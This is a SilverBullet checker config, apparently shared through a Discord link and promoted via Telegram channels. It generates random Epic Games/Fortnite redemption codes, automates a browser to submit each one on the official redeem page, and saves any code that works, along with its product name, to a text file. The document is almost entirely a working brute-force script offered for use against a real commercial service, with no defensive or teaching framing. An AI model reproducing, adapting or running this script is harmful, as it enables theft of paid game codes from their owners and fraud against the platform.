#You can download it as svb from this link:
https://cdn.discordapp.com/attachments/982266499840491560/1009189100579999814/epicgamescodegenandcheck.svb
virustotal: https://www.virustotal.com/gui/file/257d41961d8e29999d616001706418f14e1fc62e117f0bf70176a6ea5a2544ae








[SETTINGS]
{
  "Name": "Generate & Checker epicgames code",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-10-21T04:55:15.6109298-07:00",
  "AdditionalInfo": "Telegram @MRzodiack2 & @Fakecoderr",
  "RequiredPlugins": [],
  "Author": MRzodiack" | Join Telegram Channel @Fakecoders",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Generate & Checker epicgames code",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION RandomString "?m?m?m?m?m-?m?m?m?m?m-?m?m?m?m?m-?m?m?m?m?m" -> VAR "key" 

REQUEST GET "https://www.epicgames.com/store/en-US/redeem/fortnite" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "epicgames" 

BROWSERACTION Open 

NAVIGATE "https://www.epicgames.com/store/en-US/redeem/fortnite" 

ELEMENTACTION Id "dieselReactWrapper" 
  Click 

BROWSERACTION SendKeys "<TAB>||<key>" 

FUNCTION Delay "2500" 

BROWSERACTION DOMtoSOURCE "<SOURCE>" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<SOURCE>" DoesNotContain "css-1gty6cv" 
  KEYCHAIN Success OR 
    KEY "css-1gty6cv" 

PARSE "<SOURCE>" LR "<h1 class=\"css-1gty6cv\" data-component=\"Heading\">" "</h1>" CreateEmpty=FALSE -> CAP "name" 

UTILITY File "Valid Fort code.txt" AppendLines "<key> | <name> | Join Telegram Channel t.me/Fakecoders" 

#About FUNCTION Constant "t.me/Fakecoders" -> CAP "Join Telegram Channel" 
